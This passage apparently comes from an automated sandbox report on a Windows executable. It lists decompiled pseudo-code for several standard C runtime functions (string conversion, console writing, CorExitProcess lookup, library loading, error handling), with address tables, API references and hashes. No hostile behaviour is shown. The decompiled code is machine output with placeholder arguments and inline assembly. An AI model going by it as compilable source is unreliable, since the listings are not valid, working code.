GetCurrentProcess.KERNEL32(00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000,?,00403ECD,00000003), ref: 00403612
TerminateProcess.KERNEL32(00000000,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000,?,00403ECD,00000003), ref: 00403619
ExitProcess.KERNEL32 ref: 0040362B

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0172ae19e4532c11ae0ed1487fed2bd1e0a429119bbb2948d606f4d75f20fe07
Instruction ID: bfe7cab4a8d0116fd485a211d40daa1066cad8d05f2417ef62f302f9e127dae3
Opcode Fuzzy Hash: 0172ae19e4532c11ae0ed1487fed2bd1e0a429119bbb2948d606f4d75f20fe07
Instruction Fuzzy Hash: D9E0BF31000544EBCF216FA5DD499493F69EB80346F048A35FD45AB261CB3ADD56DA58

Uniqueness

Uniqueness Score: -1.00%

Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x5f1f2145
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

0x004078d4
0x004078d5
0x004078d6
0x004078dd
0x004078e2
0x004078e8
0x004078ee
0x004078f4
0x004078f7
0x004078f7
0x004078fa
0x004078fc
0x004078fc
0x004078fa
0x004078fe
0x00407903
0x0040790a
0x0040790d
0x0040790d
0x00407929
0x0040792f
0x00407934
0x00407ac7
0x00407ad2
0x00407ada
0x0040793a
0x0040793a
0x0040793d
0x00407942
0x00407946
0x0040799a
0x0040799a
0x0040799c
0x0040799e
0x00407abc
0x00407abc
0x00407abe
0x00407abf
0x00407ac5
0x00000000
0x00407ac5
0x004079af
0x004079b5
0x004079b7
0x00000000
0x00000000
0x004079bd
0x004079cf
0x004079d4
0x004079d8
0x00000000
0x00000000
0x004079e5
0x00407a1f
0x00407a22
0x00407a25
0x00407a27
0x00407a29
0x00407a2b
0x00407a77
0x00407a77
0x00407a79
0x00407a79
0x00407a7b
0x00407ab5
0x00407ab6
0x00000000
0x00407abb
0x00407a8f
0x00407a94
0x00407a96
0x00000000
0x00000000
0x00407a9a
0x00407a9b
0x00407a9c
0x00407a9f
0x00407adb
0x00407ade
0x00407aa1
0x00407aa1
0x00407aa2
0x00407aa2
0x00407aaf
0x00407ab1
0x00407ab3
0x00407ae4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab3
0x00407a2d
0x00407a30
0x00407a32
0x00407a34
0x00407a36
0x00407a39
0x00407a3e
0x00407a59
0x00407a5b
0x00407a65
0x00407a67
0x00407a68
0x00407a6a
0x00000000
0x00000000
0x00407a6c
0x00407a72
0x00407a72
0x00000000
0x00407a72
0x00407a40
0x00407a42
0x00407a46
0x00407a4b
0x00407a4d
0x00407a4f
0x00000000
0x00000000
0x00407a51
0x00000000
0x00407a51
0x004079e7
0x004079ec
0x00000000
0x00000000
0x004079f2
0x004079f4
0x00000000
0x00000000
0x00407a10
0x00407a14
0x00000000
0x00000000
0x00000000
0x00407a1a
0x0040794d
0x0040794f
0x00407951
0x00407959
0x00407978
0x0040797a
0x00407984
0x00407986
0x00407987
0x00407989
0x00000000
0x00000000
0x0040798f
0x00407995
0x00407995
0x00000000
0x00407995
0x0040795d
0x00407961
0x00407966
0x0040796a
0x00000000
0x00000000
0x00407970
0x00000000
0x00407970

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 8979d1991b27b084514560b2a02ff338e075f4c4c93b33af7b8de3ffa5b9313d
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: 8979d1991b27b084514560b2a02ff338e075f4c4c93b33af7b8de3ffa5b9313d
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x5f1f2145
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

0x0040822b
0x00408232
0x00408235
0x0040823d
0x00408241
0x0040824d
0x00408250
0x00408253
0x0040825a
0x00408262
0x00408265
0x0040826b
0x00408271
0x00408276
0x00408278
0x0040827b
0x00408280
0x0040828a
0x00408291
0x00408294
0x0040829b
0x004082a2
0x004082ce
0x004082f4
0x004082f6
0x00000000
0x004082d0
0x004082d3
0x0040839a
0x004083a6
0x004083b1
0x004083b6
0x004082d9
0x004082e0
0x004082e5
0x004082eb
0x004082f1
0x00000000
0x004082f1
0x004082eb
0x004082d3
0x004082a4
0x004082a8
0x004082ab
0x004082b1
0x004082b3
0x004082b6
0x004082ba
0x004082f7
0x004082fa
0x004082fb
0x00408300
0x00408306
0x0040830c
0x0040831b
0x00408321
0x00408327
0x0040832c
0x00408348
0x004083bb
0x004083c1
0x0040834a
0x00408352
0x0040835b
0x00408361
0x00000000
0x00408363
0x00408365
0x00408368
0x00408381
0x00000000
0x00408383
0x00408387
0x00408389
0x0040838c
0x00000000
0x0040838c
0x00408387
0x00408381
0x00408361
0x0040835b
0x00408348
0x0040832c
0x00408306
0x00000000
0x0040838f
0x0040838f
0x004083c3
0x004083cd
0x004083d5

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 90acb0092481e423abe91022460010309693860d7898e0d4ca359a13bbb5ac9d
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 90acb0092481e423abe91022460010309693860d7898e0d4ca359a13bbb5ac9d
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x5f1f2145
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

CorExitProcess, xrefs: 0040365D
mscoree.dll, xrefs: 0040364B

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 524ea9c7ee4f5dda2ac43b7b31fc6b649d0c2e677f79f724f1e227938d375a49
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 524ea9c7ee4f5dda2ac43b7b31fc6b649d0c2e677f79f724f1e227938d375a49
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x5f1f2145
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

0x004062c0
0x004062c7
0x004062ca
0x004062d3
0x004062d8
0x004062dd
0x004062e2
0x004062e5
0x004062e7
0x004062e7
0x004062ec
0x00406305
0x0040630b
0x00406310
0x004063af
0x004063b3
0x004063b8
0x004063b8
0x004063cc
0x004063d4
0x004063d4
0x00406316
0x00406319
0x0040631e
0x00406322
0x0040636e
0x00406370
0x00406372
0x00406377
0x0040638e
0x00406396
0x004063a6
0x004063a6
0x00406396
0x004063a8
0x004063a9
0x00000000
0x004063ae
0x00406324
0x00406329
0x0040632b
0x0040632d
0x0040632d
0x00406335
0x00406352
0x0040635c
0x00406361
0x00000000
0x00000000
0x00406363
0x00406369
0x00406369
0x00000000
0x00406369
0x00406339
0x0040633d
0x00406342
0x00406346
0x00000000
0x00000000
0x00406348
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: d0f26ba046c195b1f656a8ae0ed1ea6d6b8e605c2d6d6211b8118013de8994f8
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: d0f26ba046c195b1f656a8ae0ed1ea6d6b8e605c2d6d6211b8118013de8994f8
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x5f1f2146
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00405756
0x0040575a
0x00405761
0x00405765
0x00405773
0x00405789
0x0040578d
0x004057b6
0x004057b8
0x004057bc
0x004057bf
0x004057bf
0x004057c5
0x004057c7
0x00000000
0x004057c8
0x0040578f
0x00405798
0x004057a7
0x0040579a
0x0040579d
0x004057a3
0x004057a3
0x004057ab
0x00000000
0x004057ad
0x004057b0
0x004057b2
0x00000000
0x004057b2
0x004057ab
0x00405767
0x0040576c
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00404320
0x00404320
0x00404320
0x0040432a
0x0040432c
0x00404331
0x00404334
0x00404342
0x00404349
0x0040434e
0x00404351
0x00404354
0x00404366
0x0040436b
0x0040436d
0x00404378
0x0040437f
0x00404384
0x00404387
0x00404389
0x00000000
0x00000000
0x00000000
0x00000000
0x0040436f
0x0040436f
0x00000000
0x0040436f
0x00404356
0x00404356
0x00404357
0x00404357
0x0040435c
0x00404397
0x00404398
0x0040439e
0x004043a3
0x004043a6
0x004043a7
0x004043a8
0x004043af
0x004043b1
0x004043b3
0x004043b8
0x004043bb
0x004043c9
0x004043d5
0x004043d8
0x004043db
0x004043ed
0x004043f2
0x004043f4
0x004043ff
0x00404405
0x0040440d
0x0040440f
0x00000000
0x00000000
0x00000000
0x00000000
0x004043f6
0x004043f6
0x00000000
0x004043f6
0x004043dd
0x004043dd
0x004043de
0x004043de
0x00404411
0x00404412
0x00404412
0x004043bd
0x004043c3
0x004043c7
0x0040441a
0x0040441b
0x00404421
0x00000000
0x00000000
0x00000000
0x004043c7
0x00404428
0x00404428
0x00404336
0x0040433c
0x00404340
0x0040438b
0x0040438c
0x00404396
0x00000000
0x00000000
0x00000000
0x00404340

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
